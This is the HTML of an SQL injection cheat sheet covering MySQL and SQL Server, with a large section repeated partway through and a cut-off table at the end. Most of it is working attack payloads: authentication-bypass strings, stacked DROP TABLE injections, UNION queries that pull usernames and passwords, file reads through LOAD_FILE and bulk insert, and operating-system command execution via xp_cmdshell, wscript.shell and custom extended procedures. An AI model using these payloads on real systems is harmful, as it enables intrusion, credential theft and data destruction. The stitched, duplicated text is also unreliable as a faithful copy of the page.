id="SyntaxBasicAttacks" name="SyntaxBasicAttacks"></a>Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks </h2>  <h3 class="style2"><a id="21" name="21"></a>Ending / Commenting Out / Line Comments </h3>  <h4><a id="LineComments" name="LineComments"></a>Line Comments </h4>  <p class="idea"><strong>Comments out rest of the query.</strong>     <br />Line comments are generally useful for ignoring rest of the query so you don’t have to deal with fixing the syntax.</p>  <ul type="disc">   <li><code>-- </code>(SM)<code>        <br />DROP sampletable;<span class="hi">--</span>         <br />        <br /></code></li>    <li><code># </code>(M)<code>        <br />DROP sampletable;<span class="hi">#</span></code> </li> </ul>  <h5><a id="LineCommentAttacks" name="LineCommentAttacks"></a>Line Comments Sample SQL Injection Attacks</h5>  <ul type="disc">   <li><span class="inputfield">Username:</span><code> admin<span class="hi">'--</span> </code></li>    <li><code>SELECT * FROM members WHERE username = '<span class="hi">admin'--</span><span class="comment">' AND password = 'password'</span>         <br /></code><span class="idea">This is going to log you as admin user, because rest of the SQL query will be ignored.</span> </li> </ul>  <h4><a id="InlineComments" name="InlineComments"></a>Inline Comments</h4>  <p class="idea"><strong>Comments out rest of the query by not closing them</strong> or you can use for <strong>bypassing blacklisting</strong>, removing spaces, obfuscating and determining database versions.</p>  <ul type="disc">   <li><code>/*Comment Here*/</code> (SM)       <ul>       <li><code>DROP<span class="hi">/*comment*/</span>sampletable</code> </li>        <li><code>DR<span class="hi">/**/</span>OP<span class="hi">/*bypass blacklisting*/</span>sampletable</code> </li>        <li><code>SELECT<span class="hi">/*avoid-spaces*/</span>password<span class="hi">/**/</span>FROM<span class="hi">/**/</span>Members</code>           <br />          <br /></li>     </ul>   </li>    <li><code>/*! MYSQL Special SQL *</code>/ (M)       <br /><span class="idea">This is a special comment syntax for MySQL. It’s perfect for detecting MySQL version. If you put a code into this comments it’s going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than supplied version.</span>       <br />      <br /><code>SELECT <span class="hi">/*!<strong>32302</strong> 1/0, */</span> 1 FROM tablename</code> </li> </ul>  <h5><a id="InlineSamples" name="InlineSamples"></a>Classical Inline Comment SQL Injection Attack Samples </h5>  <ul type="disc">   <li><span class="inputfield">ID:</span> <code>10; DROP TABLE members <span class="hi">/*</span></code>       <br /><span class="idea">Simply get rid of other stuff at the end the of query. Same as <code>10; DROP TABLE members <span class="hi">--</span></code></span>       <br />      <br /></li>    <li><code>SELECT <span class="hi">/*!<strong>32302</strong> 1/0, */</span> 1 FROM tablename</code>       <br /><span class="idea">Will throw an <strong>divison by 0 error </strong>if MySQL version is higher than <strong>3.23.02</strong></span> </li> </ul>  <h5><a id="MySQLInlineSamples" name="MySQLInlineSamples"></a>MySQL Version Detection Sample Attacks</h5>  <ul type="disc">   <li><span class="inputfield">ID:</span> <span class="hi"><code>/*!</code></span><code><strong>32302</strong> 10<span class="hi">*/</span> </code></li>    <li><span class="inputfield">ID:</span> <code>10</code>       <br /><span class="idea">You will get the <strong>same response</strong> if MySQL version is higher than <strong>3.23.02</strong></span>       <br />      <br /></li>    <li><code>SELECT <span class="hi">/*!<strong>32302</strong> 1/0, */</span> 1 FROM tablename</code>       <br /><span class="idea">Will throw an <strong>divison by 0 error </strong>if MySQL version is higher than <strong>3.23.02</strong></span> </li> </ul>  <h3><a id="StackingQueries" name="StackingQueries"></a>Stacking Queries </h3>  <p class="idea"><strong>Executing more than one query in one transaction</strong>. This is very useful in every injection point, especially in SQL Server back ended applications. </p>  <ul type="disc">   <li><code>;</code> (S)       <br /><code>SELECT * FROM members<span class="hi">; DROP members--</span></code> </li> </ul>  <p class="idea">Ends a query and starts a new one.</p>  <h4><a id="LangDbFigure" name="LangDbFigure"></a>Language / Database Stacked Query Support Table </h4>  <p class="idea"><strong>green:</strong> supported, <strong>dark gray:</strong> not supported, <strong>light gray: </strong>unknown </p>  <table  cellspacing="1" cellpadding="5" bgcolor="#cccccc"><tbody>     <tr>       <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#ffffff"><strong>SQL Server </strong></td>        <td bgcolor="#ffffff"><strong>MySQL</strong></td>        <td bgcolor="#ffffff"><strong>PostgreSQL</strong></td>        <td bgcolor="#ffffff"><strong>ORACLE</strong></td>        <td bgcolor="#ffffff"><strong>MS Access </strong></td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>ASP</strong></td>        <td bgcolor="#99cc00"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>ASP.NET</strong></td>        <td bgcolor="#99cc00"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>PHP</strong></td>        <td bgcolor="#99cc00"> </td>        <td bgcolor="#333333"> </td>        <td class="style3" bgcolor="#99cc00"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>Java</strong></td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>        <td bgcolor="#333333"> </td>     </tr>   </tbody></table>  <p class="idea"> </p>  <p class="idea"><strong><a id="AboutMySQLandPHP" name="AboutMySQLandPHP"></a>About MySQL and PHP;</strong>     <br />To clarify some issues;     <br /><strong>PHP - MySQL doesn't support stacked queries</strong>, Java doesn't support stacked queries (<em>I'm sure for ORACLE, not quite sure about other databases</em>). <em>Normally MySQL supports stacked queries but because of database layer in most of the configurations it’s not possible to execute second query in PHP-MySQL applications or maybe MySQL client supports this, not quite sure. Can someone clarify?</em></p>  <h5><a id="StackedSamples" name="StackedSamples"></a>Stacked SQL Injection Attack Samples </h5>  <ul type="disc">   <li><span class="inputfield">ID:</span> <code>10;DROP members --</code> </li>    <li><code>SELECT * FROM products WHERE id = 10<span class="hi">; DROP members--</span></code> </li> </ul>  <p class="idea">This will run <em>DROP members</em> SQL sentence after normal SQL Query.     <br /></p>  <h3><a id="IfStatements" name="IfStatements"></a>If Statements </h3>  <p class="idea">Get response based on a if statement. This is <strong>one of the key points of Blind SQL Injection</strong>, also can be very useful to test simple stuff blindly and <strong>accurately</strong>.</p>  <h4><a id="MySQLIf" name="MySQLIf"></a>MySQL If Statement</h4>  <ul>   <li><code>IF(<strong><em>condition</em>,<em>true-part</em>,<em>false-part</em></strong>) </code>(M)<code>        <br />SELECT IF(1=1,'true','false')</code> </li> </ul>  <h4><a id="SQLServerIf" name="SQLServerIf"></a>SQL Server If Statement </h4>  <ul>   <li><code>IF <strong><em>condition</em></strong> <strong><em>true-part</em></strong> ELSE <strong><em>false-part</em></strong></code> (S)       <br /><code>IF (1=1) SELECT 'true' ELSE SELECT 'false'</code> </li> </ul>  <h5><a id="SampleIfStatements" name="SampleIfStatements"></a>If Statement SQL Injection Attack Samples </h5>  <p><code>if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0</code> (S)     <br /><span class="idea">This will throw an <strong>divide by zero error</strong> if current logged user is not <strong>"sa" or "dbo"</strong>.</span></p>  <h3><a id="UsingIntegers" name="UsingIntegers"></a>Using Integers </h3>  <p class="idea">Very useful for bypassing, <strong>magic_quotes() and similar filters</strong>, or even WAFs. </p>  <ul type="disc">   <li><code>0x<em>HEXNUMBER</em></code> (SM)       <br /><span class="idea">You can  write hex like these;</span>       <br />      <br /><code>SELECT CHAR(0x66)</code> (S)       <br /><code>SELECT 0x5045</code> <span class="idea">(<em>this is not an integer it will be a string from Hex</em>)</span> (M)       <br /><code>SELECT 0x50 + 0x45</code> <span class="idea">(<em>this is integer now!</em>)</span> (M) </li> </ul>  <h3><a id="StringOperations" name="StringOperations"></a>String  Operations </h3>  <p class="idea">String related operations. These can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database.</p>  <h4><a id="StringConcat" name="StringConcat"></a>String Concatenation </h4>  <ul type="disc">   <li><code>+</code> (S)       <br /><code>SELECT login <span class="hi">+ '-' +</span> password FROM members</code>       <br />      <br /></li>    <li><code>||</code> (*MO)       <br /><code>SELECT login <span class="hi">|| '-' ||</span> password FROM members </code></li> </ul>  <p class="idea"><strong>*About MySQL "||";</strong>     <br />If MySQL is running in ANSI mode it’s going to work but otherwise MySQL accept it as `logical operator` it’ll return 0. Better way to do it is using <code>CONCAT()</code> function in MySQL.</p>  <ul type="disc">   <li><code>CONCAT(str1, str2, str3, ...)</code> (M)       <br /><span class="idea">Concatenate supplied strings.</span>       <br /><code>SELECT <span class="hi">CONCAT(login, password)</span> FROM members</code> </li> </ul>  <h3><a id="StringwithoutQuotes" name="StringwithoutQuotes"></a>Strings without Quotes </h3>  <p class="idea">These are some direct ways to using strings but it’s always possible to use <code>CHAR()</code>(MS) and <code>CONCAT()</code>(M) to generate string without quotes.</p>  <ul type="disc">   <li><code>0x457578</code> (M) - <span class="idea">Hex Representation of string </span>      <br /><code>SELECT 0x457578</code>       <br /><span class="idea">This will be selected as string in MySQL.</span>       <br />      <br /><span class="idea">In MySQL easy way to generate hex representations of strings use this;</span>       <br /><code>SELECT CONCAT('0x',HEX('c:\\boot.ini'))</code>       <br />      <br /></li>    <li><span class="idea">Using <code>CONCAT()</code> in MySQL</span>       <br /><code>SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))</code> (M)       <br /><span class="idea">This will return ‘KLM’.</span>       <br />      <br /></li>    <li><code>SELECT CHAR(75)+CHAR(76)+CHAR(77)</code> (S)       <br /><span class="idea">This will return ‘KLM’. </span></li> </ul>  <h4><a id="HexbasedSamples" name="HexbasedSamples"></a>Hex based SQL Injection Samples</h4>  <ul>   <li><code>SELECT LOAD_FILE(<span class="hi">0x633A5C626F6F742E696E69</span>)</code> (M)       <br /><span class="idea">This will show the content of <strong>c:\boot.ini</strong></span> </li> </ul>  <h3><a id="StringModification" name="StringModification"></a>String Modification & Related </h3>  <ul type="disc">   <li><code>ASCII()</code> (SMP)       <br /><span class="idea">Returns ASCII character value of leftmost character. A must have function for Blind SQL Injections.</span>       <br />      <br /><code>SELECT ASCII('a')</code>       <br />      <br /></li>    <li><code>CHAR()</code> (SM)       <br /><span class="idea">Convert an integer of ASCII.</span>       <br />      <br /><code>SELECT CHAR(64)</code> </li> </ul>  <h2><a id="UnionInjections" name="UnionInjections"></a>Union Injections</h2>  <p class="idea">With union you do SQL queries cross-table. Basically you can poison query to return records from another table. </p>  <p><code>SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members </code>    <br /><span class="idea">This will combine results from both news table and members table and return all of them. </span></p>  <p><span class="idea">Another Example : </span>    <br /><code>' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--</code></p>  <h3><a id="UnionLanguageIssues" name="UnionLanguageIssues"></a>UNION – Fixing Language Issues</h3>  <p class="idea">While exploiting Union injections sometimes you get errors because of different language settings (<em>table settings, field settings, combined table / db settings etc.</em>) these functions are quite useful to fix this problem. It's rare but if you dealing with <em>Japanese, Russian, Turkish</em> etc. applications then you will see it. </p>  <ul>   <li>SQL Server (S)      <br />Use <span class="hi"><code>field</code> <strong><code>COLLATE</code></strong><code> SQL_Latin1_General_Cp1254_CS_AS</code></span> or some other valid one - <em>check out SQL Server documentation</em>.       <br />      <br /><code>SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members</code>       <br />      <br /></li>    <li>MySQL (M)      <br /><code>Hex() </code><span class="idea">for every possible issue</span> </li> </ul>  <h3><a id="ByPassingLoginScreens" name="ByPassingLoginScreens"></a>Bypassing Login Screens (SMO+) </h3> <span class="idea"><em>SQL Injection 101</em>, Login tricks </span>  <ul>   <li><code>admin' -- </code></li>    <li><code>admin' # </code></li>    <li><code>admin'/*</code> </li>    <li><code>' or 1=1--</code> </li>    <li><code>' or 1=1#</code> </li>    <li><code>' or 1=1/*</code> </li>    <li><code>') or '1'='1--</code> </li>    <li><code>') or ('1'='1--</code> </li>    <li>.... </li> </ul>  <ul>   <li>Login as different user (SM*)      <br /><code>' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--</code> </li> </ul>  <p><em>*Old versions of MySQL doesn't support union queries </em></p>  <h3><a id="UnionLanguageIssues" name="UnionLanguageIssues"></a>Bypassing second MD5 hash check login screens </h3>  <p class="idea">If application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database. </p>  <h4><a id="BypassingMD5Hash" name="BypassingMD5Hash"></a>Bypassing MD5 Hash Check Example (MSP) </h4>  <p><span class="inputfield">Username :</span><code> admin</code>     <br /><span class="inputfield">Password :</span> <code>1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055</code></p>  <p><code>81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234) </code></p>  <h3> </h3>  <h3>Error Based - Find Columns Names </h3>  <h4>Finding Column Names with <strong>HAVING BY</strong> - Error Based (S) </h4>  <p><em>In the same order, </em></p>  <ul>   <li>'<code> HAVING 1=1 -- </code></li>    <li><code>' GROUP BY <strong class="hi">table.columnfromerror1</strong> HAVING 1=1 -- </code></li>    <li><code>' GROUP BY <strong class="hi">table.columnfromerror1, columnfromerror2</strong> HAVING 1=1 --</code> </li>    <li><code>' GROUP BY <strong class="hi">table.columnfromerror1, columnfromerror2, columnfromerror(n) </strong>HAVING 1=1 --</code> <em>and so on</em> </li>    <li>If you are not getting any more error then it's done. </li> </ul>  <h4>Finding how many columns in SELECT query by <strong>ORDER BY</strong> <strong>(MSO+)</strong></h4>  <p>Finding column number by ORDER BY can speed up the UNION SQL Injection process.</p>  <ul>   <li><code>ORDER BY 1-- </code></li>    <li><code>ORDER BY 2--</code> </li>    <li><code>ORDER BY N--</code> <em>so on</em> </li>    <li>Keep going until get an error. Error means you found the number of selected columns. </li> </ul>  <h3>Data types, UNION, etc. </h3>  <h4>Hints,</h4>  <ul>   <li>Always use <strong>UNION</strong> with <strong>ALL </strong>because of <strong>image</strong> similiar non-distinct field types. By default union tries to get records with distinct. </li>    <li>To get rid of unrequired records from left table use -1 or any not exist record search in the beginning of query (<em>if injection is in WHERE</em>). This can be critical if you are only getting one result at a time. </li>    <li>Use NULL in UNION injections for most data type instead of trying to guess string, date, integer etc.      <ul>       <li>Be careful in Blind situtaions may you can understand error is coming from DB or application itself. Because languages like ASP.NET generally throws errors while trying to use NULL values (<em>because normally developers are not expecting to see NULL in a username field</em>) </li>     </ul>   </li> </ul>  <h4>Finding Column Type </h4>  <ul>   <li><code>' union select <span class="hi">sum(<strong>columntofind</strong>)</span> from <strong>users</strong>--</code> (S)       <br /><code>Microsoft OLE DB Provider for ODBC Drivers error '80040e07'        <br />[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a <strong class="hi">varchar</strong> data type as an argument.</code>       <br />      <br /><em>If you are not getting error it means </em>column is numeric.       <br />      <br /></li>    <li>Also you can use <span class="hi">CAST()</span> or <span class="hi">CONVERT()</span>       <ul>       <li><code>SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--</code>           <br />          <br /></li>     </ul>   </li>    <li><code>11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-</code>       <br />No Error - Syntax is right. MS SQL Server Used. Proceeding.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-</code>       <br />No Error – First column is an integer.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 -- </code>      <br />Error! – Second column is not an integer.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,’2’,NULL,NULL WHERE 1=2 –-</code>       <br />No Error – Second column is a string.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,’2’,3,NULL WHERE 1=2 –-</code>       <br />Error! – Third column is not an integer. ...       <br />      <br /><code>Microsoft OLE DB Provider for SQL Server error '80040e07'        <br />Explicit conversion from data type <span class="hi"><strong>int</strong> to image</span> is not allowed.</code> </li> </ul>  <p><strong>You’ll get convert() errors before union target errors ! </strong>So<strong> </strong>start with<strong> </strong>convert() then union<strong></strong></p>  <h3>Simple Insert (MSO+) </h3> <code>'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*</code>   <h3>Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes</h3>  <p><strong>@@version</strong> (MS)     <br />Version of database and more details for SQL Server. It's a constant. You can just select it like any other column, you don't need to supply table name. Also you can use insert, update statements or in functions. </p>  <p><code>INSERT INTO members(id, user, pass) VALUES(1, ''+<span class="hi">SUBSTRING(@@version,1,10)</span> ,10)</code></p>  <h4><a id="BulkInsert" name="BulkInsert"></a>Bulk Insert (S) </h4>  <p>Insert a file content to a table. If you don't know internal path of web application you can <strong>read IIS (</strong><em>IIS 6 only</em><strong>) metabase file </strong>(<em>%systemroot%\system32\inetsrv\MetaBase.xml</em>) and then search in it to identify application path. </p>  <ol>   <ol>     <li>Create table foo( line varchar(8000) ) </li>      <li>bulk insert foo from 'c:\inetpub\wwwroot\login.asp' </li>      <li><em>Drop temp table, and repeat for another file. </em></li>   </ol> </ol>  <h4>BCP (S) </h4>  <p>Write text file. Login Credentials are required to use this function.    <br /><code>bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar </code></p>  <h4>VBS, WSH in SQL Server (S) </h4>  <p>You can use VBS, WSH scripting in SQL Server because of ActiveX support. </p>  <p><code>declare @o int      <br />exec sp_oacreate 'wscript.shell', @o out       <br />exec sp_oamethod @o, 'run', NULL, 'notepad.exe'       <br /></code><code><em>Username:</em> '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --       <br /></code></p>  <h4>Executing system commands, xp_cmdshell (S) </h4>  <p>Well known trick, By default it's disabled in <em>SQL Server 2005. </em>You need to have admin access. </p>  <p><code>EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'</code>     <br /></p>  <p>Simple ping check (<em>configure your firewall or sniffer to identify request before launch it</em>), </p>  <p><code>EXEC master.dbo.xp_cmdshell 'ping <ip address>'</code></p>  <p>You can not read results directly from error or union or something else. </p>  <h4>Some Special Tables in SQL Server (S) </h4>  <ul>   <li>Error Messages      <br /><code>master..sysmessages </code>      <br />      <br /></li>    <li>Linked Servers      <br /><code>master..sysservers</code>       <br />      <br /></li>    <li>Password (<em>2000 and 20005 both can be crackable, they use very similar hashing algorithm </em>)       <br />SQL Server 2000:<code> masters..sysxlogins</code>       <br />SQL Server 2005 : <code>sys.sql_logins        <br /></code></li> </ul>  <h4>More Stored Procedures for SQL Server (S) </h4>  <ol>   <li>Cmd Execute (<strong>xp_cmdshell</strong>)       <br />exec master..xp_cmdshell 'dir'       <br />      <br /></li>    <li>Registry Stuff (<strong>xp_regread</strong>)       <br />      <ol>       <li>xp_regaddmultistring </li>        <li>xp_regdeletekey </li>        <li>xp_regdeletevalue </li>        <li>xp_regenumkeys </li>        <li>xp_regenumvalues </li>        <li>xp_regread </li>        <li>xp_regremovemultistring </li>        <li>xp_regwrite          <br />exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'           <br />exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'           <br />          <br /></li>     </ol>   </li>    <li>Managing Services (<strong>xp_servicecontrol</strong>)       <br /></li>    <li>Medias (<strong>xp_availablemedia</strong>)       <br /></li>    <li>ODBC Resources (<strong>xp_enumdsn</strong>)       <br /></li>    <li>Login mode (<strong>xp_loginconfig</strong>)       <br /></li>    <li>Creating Cab Files (<strong>xp_makecab</strong>)       <br /></li>    <li>Domain Enumeration (<strong>xp_ntsec_enumdomains</strong>)       <br /></li>    <li>Process Killing (<em>need PID</em>) (<strong>xp_terminate_process</strong>)       <br /></li>    <li>Add new procedure (<em>virtually you can execute whatever you want</em>)       <br />sp_addextendedproc ‘xp_webserver’, ‘c:\temp\x.dll’       <br />exec xp_webserver </li>    <li>Write text file to a UNC or an internal path (sp_makewebtask)      <br /></li> </ol>  <h4>MSSQL Bulk Notes </h4>  <p><code>SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/ </code></p>  <p><code>DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0</code></p>  <p>HOST_NAME()    <br />IS_MEMBER (Transact-SQL)  <br />IS_SRVROLEMEMBER (Transact-SQL)  <br />OPENDATASOURCE (Transact-SQL) </p>  <pre>INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"</pre>
+    <div class="post"><p> </p>  <h2><em>Find and exploit SQL Injections with <a href="http://www.mavitunasecurity.com/">Netsparker, Next Generation Web Application Security Scanner</a></em></h2>  <p> </p>  <p><em>SQL Injection Cheat Sheet, <strong>Document Version 1.4</strong></em></p>  <h2><a id="about" name="about"></a>About SQL Injection Cheat Sheet </h2>  <p>Currently only for <strong>MySQL</strong> and <strong>Microsoft SQL Server, </strong>some <strong>ORACLE</strong> and some <strong>PostgreSQL</strong>. Most of samples are not correct for every single situation. Most of the real world environments may change because of parenthesis, different code bases and unexpected, strange SQL sentences.     <br />    <br />Samples are provided to allow reader to get basic idea of a potential attack and almost every section includes a brief information about itself. </p>  <table  cellspacing="3" cellpadding="3"><tbody>     <tr>       <td align="right"><strong>M : </strong></td>        <td>MySQL </td>     </tr>      <tr>       <td align="right"><strong>S : </strong></td>        <td>SQL Server</td>     </tr>      <tr>       <td align="right"><strong>P : </strong></td>        <td>PostgreSQL</td>     </tr>      <tr>       <td align="right"><strong>O : </strong></td>        <td>Oracle</td>     </tr>      <tr>       <td align="right"><strong>+ : </strong></td>        <td>Possibly all other databases </td>     </tr>   </tbody></table>  <h5><em><strong>Examples;</strong></em></h5>  <ul>   <li><em>(MS) means : MySQL and SQL Server etc. </em></li>    <li>(M*S) means : Only in some versions of MySQL or special conditions see related note and SQL Server </li> </ul>  <h2><a id="TOC" name="TOC"></a>Table Of Contents </h2>  <ol>   <li><a href="#about">About SQL Injection Cheat Sheet </a></li>    <li><a href="#SyntaxBasicAttacks">Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks </a>      <ol>       <li><a href="#LineComments">Line Comments </a>          <ul>           <li><a href="#LineCommentAttacks">SQL Injection Attack Samples</a> </li>         </ul>       </li>        <li><a href="#InlineComments">Inline Comments </a>          <ul>           <li><a href="#InlineSamples">Classical Inline Comment SQL Injection Attack Samples</a> </li>            <li><a href="#MySQLInlineSamples">MySQL Version Detection Sample Attacks</a> </li>         </ul>       </li>        <li><a href="#StackingQueries">Stacking Queries</a>           <ul>           <li><a href="#LangDbFigure">Language / Database Stacked Query Support Table </a></li>            <li><a href="#AboutMySQLandPHP">About MySQL and PHP</a> </li>            <li><a href="#StackedSamples">Stacked SQL Injection Attack Samples</a> </li>         </ul>       </li>        <li><a href="#IfStatements">If Statements</a>           <ul>           <li><a href="#MySQLIf">MySQL If Statement</a> </li>            <li><a href="#SQLServerIf">SQL Server If Statement </a></li>            <li><a href="#SampleIfStatements">If Statement SQL Injection Attack Samples </a></li>         </ul>       </li>        <li><a href="#UsingIntegers">Using Integers </a></li>        <li><a href="#StringOperations">String  Operations</a>           <ul>           <li><a href="#StringConcat">String Concatenation </a></li>         </ul>       </li>        <li><a href="#StringwithoutQuotes">Strings without Quotes</a>           <ul>           <li><a href="#HexbasedSamples">Hex based SQL Injection Samples</a> </li>         </ul>       </li>        <li><a href="#StringModification">String Modification & Related </a></li>        <li><a href="#UnionInjections">Union Injections</a>           <ul>           <li><a href="#UnionLanguageIssues">UNION – Fixing Language Issues</a> </li>         </ul>       </li>        <li><a href="#ByPassingLoginScreens">Bypassing Login Screens</a> </li>        <li><a href="#Enablecmdshell">Enabling xp_cmdshell in SQL Server 2005 </a></li>        <li><em>Other parts are not so well formatted but check out by yourself, drafts, notes and stuff, scroll down and see. </em></li>     </ol>   </li> </ol>  <h2><a id="SyntaxBasicAttacks" name="SyntaxBasicAttacks"></a>Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks </h2>  <h3 class="style2"><a id="21" name="21"></a>Ending / Commenting Out / Line Comments </h3>  <h4><a id="LineComments" name="LineComments"></a>Line Comments </h4>  <p class="idea"><strong>Comments out rest of the query.</strong>     <br />Line comments are generally useful for ignoring rest of the query so you don’t have to deal with fixing the syntax.</p>  <ul type="disc">   <li><code>-- </code>(SM)<code>        <br />DROP sampletable;<span class="hi">--</span>         <br />        <br /></code></li>    <li><code># </code>(M)<code>        <br />DROP sampletable;<span class="hi">#</span></code> </li> </ul>  <h5><a id="LineCommentAttacks" name="LineCommentAttacks"></a>Line Comments Sample SQL Injection Attacks</h5>  <ul type="disc">   <li><span class="inputfield">Username:</span><code> admin<span class="hi">'--</span> </code></li>    <li><code>SELECT * FROM members WHERE username = '<span class="hi">admin'--</span><span class="comment">' AND password = 'password'</span>         <br /></code><span class="idea">This is going to log you as admin user, because rest of the SQL query will be ignored.</span> </li> </ul>  <h4><a id="InlineComments" name="InlineComments"></a>Inline Comments</h4>  <p class="idea"><strong>Comments out rest of the query by not closing them</strong> or you can use for <strong>bypassing blacklisting</strong>, removing spaces, obfuscating and determining database versions.</p>  <ul type="disc">   <li><code>/*Comment Here*/</code> (SM)       <ul>       <li><code>DROP<span class="hi">/*comment*/</span>sampletable</code> </li>        <li><code>DR<span class="hi">/**/</span>OP<span class="hi">/*bypass blacklisting*/</span>sampletable</code> </li>        <li><code>SELECT<span class="hi">/*avoid-spaces*/</span>password<span class="hi">/**/</span>FROM<span class="hi">/**/</span>Members</code>           <br />          <br /></li>     </ul>   </li>    <li><code>/*! MYSQL Special SQL *</code>/ (M)       <br /><span class="idea">This is a special comment syntax for MySQL. It’s perfect for detecting MySQL version. If you put a code into this comments it’s going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than supplied version.</span>       <br />      <br /><code>SELECT <span class="hi">/*!<strong>32302</strong> 1/0, */</span> 1 FROM tablename</code> </li> </ul>  <h5><a id="InlineSamples" name="InlineSamples"></a>Classical Inline Comment SQL Injection Attack Samples </h5>  <ul type="disc">   <li><span class="inputfield">ID:</span> <code>10; DROP TABLE members <span class="hi">/*</span></code>       <br /><span class="idea">Simply get rid of other stuff at the end the of query. Same as <code>10; DROP TABLE members <span class="hi">--</span></code></span>       <br />      <br /></li>    <li><code>SELECT <span class="hi">/*!<strong>32302</strong> 1/0, */</span> 1 FROM tablename</code>       <br /><span class="idea">Will throw an <strong>division by 0 error </strong>if MySQL version is higher than <strong>3.23.02</strong></span> </li> </ul>  <h5><a id="MySQLInlineSamples" name="MySQLInlineSamples"></a>MySQL Version Detection Sample Attacks</h5>  <ul type="disc">   <li><span class="inputfield">ID:</span> <span class="hi"><code>/*!</code></span><code><strong>32302</strong> 10<span class="hi">*/</span> </code></li>    <li><span class="inputfield">ID:</span> <code>10</code>       <br /><span class="idea">You will get the <strong>same response</strong> if MySQL version is higher than <strong>3.23.02</strong></span>       <br />      <br /></li>    <li><code>SELECT <span class="hi">/*!<strong>32302</strong> 1/0, */</span> 1 FROM tablename</code>       <br /><span class="idea">Will throw an <strong>division by 0 error </strong>if MySQL version is higher than <strong>3.23.02</strong></span> </li> </ul>  <h3><a id="StackingQueries" name="StackingQueries"></a>Stacking Queries </h3>  <p class="idea"><strong>Executing more than one query in one transaction</strong>. This is very useful in every injection point, especially in SQL Server back ended applications. </p>  <ul type="disc">   <li><code>;</code> (S)       <br /><code>SELECT * FROM members<span class="hi">; DROP members--</span></code> </li> </ul>  <p class="idea">Ends a query and starts a new one.</p>  <h4><a id="LangDbFigure" name="LangDbFigure"></a>Language / Database Stacked Query Support Table </h4>  <p class="idea"><strong>green:</strong> supported, <strong>dark gray:</strong> not supported, <strong>light gray: </strong>unknown </p>  <table  cellspacing="1" cellpadding="5" bgcolor="#cccccc"><tbody>     <tr>       <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#ffffff"><strong>SQL Server </strong></td>        <td bgcolor="#ffffff"><strong>MySQL</strong></td>        <td bgcolor="#ffffff"><strong>PostgreSQL</strong></td>        <td bgcolor="#ffffff"><strong>ORACLE</strong></td>        <td bgcolor="#ffffff"><strong>MS Access </strong></td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>ASP</strong></td>        <td bgcolor="#99cc00"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>ASP.NET</strong></td>        <td bgcolor="#99cc00"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>PHP</strong></td>        <td bgcolor="#99cc00"> </td>        <td bgcolor="#333333"> </td>        <td class="style3" bgcolor="#99cc00"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td 